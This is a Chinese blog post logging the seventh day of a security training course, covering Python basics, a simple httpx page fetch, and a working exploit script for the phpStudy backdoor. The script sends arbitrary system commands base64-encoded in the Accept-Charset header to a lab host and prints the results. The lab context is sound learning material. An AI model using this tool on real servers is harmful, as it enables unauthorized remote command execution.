实训第七天

博主： Xherlock
发布时间：2022 年 07 月 18 日
286 次浏览
暂无评论
1794字数
分类：实训

实训第七天

爬虫编写：网络上搜集各类信息的程序

网页爬虫：HTTP协议

实现路径：python+httpx（requests）库

学习python基础语言
编写输出星号的脚本(要求：编写一个底部具有11个星号的三角形)
```
for i in range(6):
    print(' ' * (6-i) + '*' * (2 * i + 1))
```

爬取百度首页html，写入本地的baidu.html文件中

import httpx

strURL = r"https://www.baidu.com/"
strHTML = httpx.get(strURL).text

strFile = r"./baidu.html"

fp = open(strFile, 'w', encoding='utf-8')
fp.write(strHTML)

编写脚本输出9*9乘法表

for i in range(1, 10):
    for j in range(1, i+1):
        print('{} * {} = {}\t'.format(i, j, i * j), end='')
    print('')

使用burpsuite在目标PHP网站上后门执行系统命令

了解httpx用法，学习requests文档
利用httpx模块，编写phpstudy后门利用工具

目标：要求能够循环接收用户系统命令输入，将返回的结果正常解码展示到屏幕上。

import httpx
from base64 import b64encode

strURL = r'http://192.168.7.138/shell.php'
while True:
    cmd = input('请输入命令：')
    if cmd == 'q':
        print('结束exploitation')
        break
    strCommand = 'system("' + cmd + '");'
    strB64Command = b64encode(strCommand.encode()).decode()
    headers = {
        'Accept-Encoding': 'gzip,deflate',
        'Accept-Charset': strB64Command
    }
    strHTML = httpx.get(strURL, headers=headers).content.split(b'\n\xef\xbb\xbf')[0].decode('GB2312')
    print(strHTML)

学习python正则表达式

最后修改：2022 年 07 月 18 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

Win11新机鼓捣记录
浏览次数: 1828
C++学习
浏览次数: 1157
栈~数制转换
浏览次数: 1128
Python实现文件管理系统（重命名和删除）
浏览次数: 1102
汇编语言学习（一）~基础知识
浏览次数: 1073

顶点软件
你写得非常清晰明了，让我很容易理解你的观点。
mars
博主你好，请问怎么知道的alloc函数属于Buffer下的方法...
lj
该评论仅登录用户及评论双方可见
Mr.Guan
:@(赞一个)
Typecho
欢迎加入 Typecho 大家族

数据结构与算法~栈与队列
浏览次数: 387
强烈推荐火绒杀毒软件!!!
浏览次数: 480
应用层（三）
浏览次数: 599
网络层（一）
浏览次数: 446
C语言文件函数
浏览次数: 295

实训第七天

Xherlock • 2022 年 07 月 18 日

<h1>实训第七天</h1><ol><li>爬虫编写：网络上搜集各类信息的程序</li></ol><p>网页爬虫：HTTP协议</p><p>实现路径：python+httpx（requests）库</p><ol><li>学习python基础语言</li><li><p>编写输出星号的脚本(要求：编写一个底部具有11个星号的三角形)</p><pre><code class="lang-python">for i in range(6):
    print(' ' * (6-i) + '*' * (2 * i + 1))</code></pre></li></ol><p><img src="http://xherlock.top/usr/uploads/2022/07/3702977647.png" alt="image-20220718100910295.png" title="image-20220718100910295.png"style=""></p><ol><li><p>爬取百度首页html，写入本地的<code>baidu.html</code>文件中</p><pre><code class="lang-python">import httpx

strURL = r&quot;https://www.baidu.com/&quot;
strHTML = httpx.get(strURL).text

strFile = r&quot;./baidu.html&quot;

fp = open(strFile, 'w', encoding='utf-8')
fp.write(strHTML)</code></pre></li><li><p>编写脚本输出9*9乘法表</p><pre><code class="lang-python">for i in range(1, 10):
    for j in range(1, i+1):
        print('{} * {} = {}\t'.format(i, j, i * j), end='')
    print('')</code></pre></li></ol><p><img src="http://xherlock.top/usr/uploads/2022/07/3954077334.png" alt="image-20220718140933314.png" title="image-20220718140933314.png"style=""></p><ol><li>使用burpsuite在目标PHP网站上后门执行系统命令</li></ol><p><img src="http://xherlock.top/usr/uploads/2022/07/299996679.png" alt="image-20220718144547466.png" title="image-20220718144547466.png"style=""></p><ol><li>了解httpx用法，学习requests文档</li><li>利用httpx模块，编写phpstudy后门利用工具</li></ol><p>目标：要求能够循环接收用户系统命令输入，将返回的结果正常解码展示到屏幕上。</p><pre><code class="lang-python">import httpx
from base64 import b64encode

strURL = r'http://192.168.7.138/shell.php'
while True:
    cmd = input('请输入命令：')
    if cmd == 'q':
        print('结束exploitation')
        break
    strCommand = 'system(&quot;' + cmd + '&quot;);'
    strB64Command = b64encode(strCommand.encode()).decode()
    headers = {
        'Accept-Encoding': 'gzip,deflate',
        'Accept-Charset': strB64Command
    }
    strHTML = httpx.get(strURL, headers=headers).content.split(b'\n\xef\xbb\xbf')[0].decode('GB2312')
    print(strHTML)</code></pre><p><img src="http://xherlock.top/usr/uploads/2022/07/3939585897.png" alt="image-20220718165836602.png" title="image-20220718165836602.png"style=""></p><ol><li>学习python正则表达式</li></ol>